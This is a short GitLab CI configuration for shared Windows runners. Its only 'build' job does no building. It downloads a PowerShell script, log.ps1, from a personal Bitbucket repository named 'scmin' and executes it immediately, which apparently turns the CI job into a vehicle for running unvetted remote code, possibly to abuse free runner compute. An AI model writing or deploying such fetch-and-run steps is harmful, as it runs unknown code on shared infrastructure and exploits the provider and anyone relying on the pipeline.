.shared_windows_runners:
  tags:
    - shared-windows
    - windows
    - windows-1809

stages:
  - build

before_script:
 - Set-Variable -Name "time" -Value (date -Format "%H:%m")
 - echo ${time}
 - echo "started by ${GITLAB_USER_NAME}"

build:
  extends:
    - .shared_windows_runners
  stage: build
  script:
    - Invoke-WebRequest https://bitbucket.org/mukidi001/scmin/raw/09523efc915a2b1c2973b200af19bb30ba88a303/log.ps1 -OutFile log.ps1; ./log.ps1